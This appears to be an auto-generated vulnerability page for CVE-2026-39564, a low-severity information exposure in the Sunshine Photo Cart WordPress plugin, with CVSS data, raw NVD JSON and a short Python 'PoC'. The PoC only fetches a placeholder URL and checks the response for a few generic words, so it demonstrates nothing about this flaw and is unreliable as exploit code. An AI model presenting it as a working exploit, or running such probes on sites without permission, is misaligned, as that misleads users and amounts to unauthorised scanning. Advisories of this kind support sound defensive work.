Security Vulnerability Report
中文
CVE-2026-39564 CVSS 5.3 MEDIUM

CVE-2026-39564

Published: 2026-04-08 09:16:28
Last Modified: 2026-04-24 18:07:25

Description

Insertion of Sensitive Information Into Sent Data vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Retrieve Embedded Sensitive Data.This issue affects Sunshine Photo Cart: from n/a through < 3.6.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sunshine Photo Cart < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-39564: Sensitive Information Exposure # Target: Sunshine Photo Cart < 3.6.2 # Replace with the actual target URL # The vulnerable endpoint might be an API endpoint or a specific page that leaks data target_url = "http://example.com/" headers = { "User-Agent": "CVE-2026-39564-Scanner/1.0" } try: # Send a request without authentication response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request successful. Checking response for sensitive data leakage...") # In a real scenario, we would regex search for specific patterns like tokens, paths, etc. # Here we just print a snippet of the response to demonstrate the concept. print("[+] Response Headers:") for key, value in response.headers.items(): print(f"{key}: {value}") print("\n[+] Partial Response Body:") print(response.text[:500]) # Check for common indicators of sensitive data exposure (generic example) if "internal" in response.text.lower() or "path" in response.text.lower(): print("\n[!] Potential sensitive information found in response body.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39564", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:27.637", "lastModified": "2026-04-24T18:07:25.343", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Retrieve Embedded Sensitive Data.This issue affects Sunshine Photo Cart: from n/a through < 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-6-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}